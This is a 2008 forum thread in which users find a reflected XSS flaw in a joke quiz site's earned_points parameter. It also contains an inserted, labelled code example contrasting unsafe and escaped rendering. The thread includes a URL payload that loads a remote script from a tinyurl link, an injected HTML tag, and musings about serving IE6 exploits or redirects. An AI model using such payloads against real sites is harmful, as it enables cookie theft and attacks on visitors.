
-----------------------------------
Aziz
Wed Jul 30, 2008 11:59 am

How much are you worth?
-----------------------------------
I am about $260k. Check it out:

http://www.howmuchisyoursoulworth.com/results.html?radioq0=on&radioq1=on&radioq2=on&radioq3=on&radioq4=on&radioq5=on&radioq6=on&radioq7=on&radioq8=on&radioq9=on&radioq10=on&radioq11=on&radioq12=on&radioq13=on&radioq14=on&earned_points=263090

It's been the hit on IRC lately...

-----------------------------------
Dan
Wed Jul 30, 2008 12:01 pm

RE:How much are you worth?
-----------------------------------
I am worth:
http://www.howmuchisyoursoulworth.com/results.html?radioq0=on&radioq1=on&radioq2=on&radioq3=on&radioq4=on&radioq5=on&radioq6=on&radioq7=on&radioq8=on&radioq9=on&radioq10=on&radioq11=on&radioq12=on&radioq13=on&radioq14=on&earned_points=%3Cscript%20src=%22http://tinyurl.com/5a785n%22%3E


XSS is bad for your cookies.
Do your part in preventing rickroll attacks, parse your input!


-----------------------------------
DemonWasp
Wed Jul 30, 2008 1:33 pm

RE:How much are you worth?
-----------------------------------
@Dan: Well done, well done. To be honest though, it's not like it's a serious site, so at least this isn't showing up on Paypal or similar.

I'm apparently worth squat: http://www.howmuchisyoursoulworth.com/results.html?earned_points=71605

(You can rip out the &radiog##=on nonsense and it doesn't have any effect)

-----------------------------------
Tony
Wed Jul 30, 2008 3:03 pm

RE:How much are you worth?
-----------------------------------
Page source tells me the max I can be worth is

 


-----------------------------------
DemonWasp
Wed Jul 30, 2008 3:20 pm

RE:How much are you worth?
-----------------------------------
That only applies as long as you don't have Firebug, though, Tony...you can modify the value of hidden inputs (or show them, etc) with the flick of a button.

I sense someone about to post a screen cap of them being worth a million soul bucks.

-----------------------------------
Aziz
Wed Jul 30, 2008 3:27 pm

RE:How much are you worth?
-----------------------------------
That input has nothing to do with it, though:

http://www.howmuchisyoursoulworth.com/results.html?earned_points=999999999999999999

-----------------------------------
Tony
Wed Jul 30, 2008 3:29 pm

Re: How much are you worth?
-----------------------------------
Just a million?

http://www.howmuchisyoursoulworth.com/results.html?earned_points=%3Cblink%3EGoogol%3C/blink%3E

Don't even need Firebug to inject arbitrary HTML into the page.

-----------------------------------
DemonWasp
Wed Jul 30, 2008 3:36 pm

RE:How much are you worth?
-----------------------------------
Ah, my bad. I thought the max-value hidden input was on the final page, but clearly not. It clearly doesn't even make an attempt to make sure you entered something valid - strings instead of ints? Come on!

It's great when pages have no validation.

-----------------------------------
Tony
Wed Jul 30, 2008 5:16 pm

RE:How much are you worth?
-----------------------------------
Not just strings, but full out HTML. The "number" is rendered by something along the lines of

document.write(whatever_url_argument)


Meaning one could inject their own javascript into the page and essentially make that page do whatever they wanted. Which is exactly what Dan has done.
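
The pattern described in the post above, next to a hardened version, as an added example that is not part of the original thread or the site's code. The function names, the surrounding markup and the `MAX_POINTS` cap are assumptions (the real maximum from the page source is not shown in the thread); the query strings are the ones posted above.

```javascript
// Assumed cap: the thread does not show the real maximum from the page source.
const MAX_POINTS = 1000000;

// What the thread describes: the raw URL argument goes straight into the page.
// Returns the HTML string that document.write() would receive.
function renderUnsafe(search) {
  const raw = new URLSearchParams(search).get("earned_points") || "";
  return "<p>Your soul is worth $" + raw + "</p>"; // constructed markup
}

// Validation: accept only a plain non-negative integer within the cap.
function parseEarnedPoints(search) {
  const raw = new URLSearchParams(search).get("earned_points");
  if (raw === null || !/^[0-9]{1,7}$/.test(raw)) return null;
  const n = Number(raw);
  return n <= MAX_POINTS ? n : null;
}

// Output encoding for an HTML text context, applied even to validated values.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: validate first, then encode on output.
// In a browser, assigning to element.textContent avoids HTML parsing entirely.
function renderSafe(search) {
  const points = parseEarnedPoints(search);
  if (points === null) return "<p>Invalid score.</p>";
  return "<p>Your soul is worth $" + escapeHtml(points) + "</p>";
}

// Query strings taken from the posts in this thread.
const samples = [
  "?earned_points=263090",
  "?earned_points=999999999999999999",
  "?earned_points=%3Cblink%3EGoogol%3C/blink%3E",
];
for (const s of samples) {
  console.log(s);
  console.log("  unsafe:", renderUnsafe(s));
  console.log("  safe:  ", renderSafe(s));
}
```
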

-----------------------------------
LaZ3R
Wed Jul 30, 2008 6:26 pm

RE:How much are you worth?
-----------------------------------
edit: Woops... posted really long link and ruined the page horizontally ... my bad :D

-----------------------------------
Dan
Wed Jul 30, 2008 9:11 pm

Re: RE:How much are you worth?
-----------------------------------
@Dan: Well done, well done. To be honest though, it's not like it's a serious site, so at least this isn't showing up on Paypal or similar.

Yes and no. Although this page itself does not have any valuable cookies to steal, I could still inject an exploit for old versions of IE and take out a few IE 6 users, or just redirect to a shock site and piss people off ;) Using JavaScript you could also change any content on the page to give people a false idea of what the page actually says. And if you are really smart you might be able to make it make the client attack another site.
